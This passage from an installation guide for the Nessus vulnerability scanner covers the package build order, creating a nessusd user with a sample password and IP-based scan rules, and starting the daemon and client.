You can also install the Nessus tar archives individually. To install Nessus, you have to download and compile these packages in the following order:

nessus-libraries
libnasl
nessus-core
nessus-plugins

See the compilation instructions if needed.

The first method is generally the easiest to carry out. However, it is hardly secure: if you install this way, use a normal user account rather than typing the root password, since any password you type, even root's, may be sniffed.
3.2. Create a nessusd account

# nessus-adduser
Addition of a new nessusd user
------------------------------

Login : renaud
Authentication (pass/cert) [pass] : pass
Password : secret

User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that renaud2 has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rules set)
deny 10.163.156.1
allow 10.163.156.0/24
default deny

Login             : renaud
Password          : secret
DN                :
Rules             :
deny 10.163.156.1
allow 10.163.156.0/24
default deny

Is that ok ? (y/n) [y] y
user added.
3.3. Start the service

# nessusd -D

3.4. Connect to nessusd

# nessus

This opens a window; follow the prompts. If anything is unclear, go to http://www.nessus.org/demo/first.html, which has a detailed description.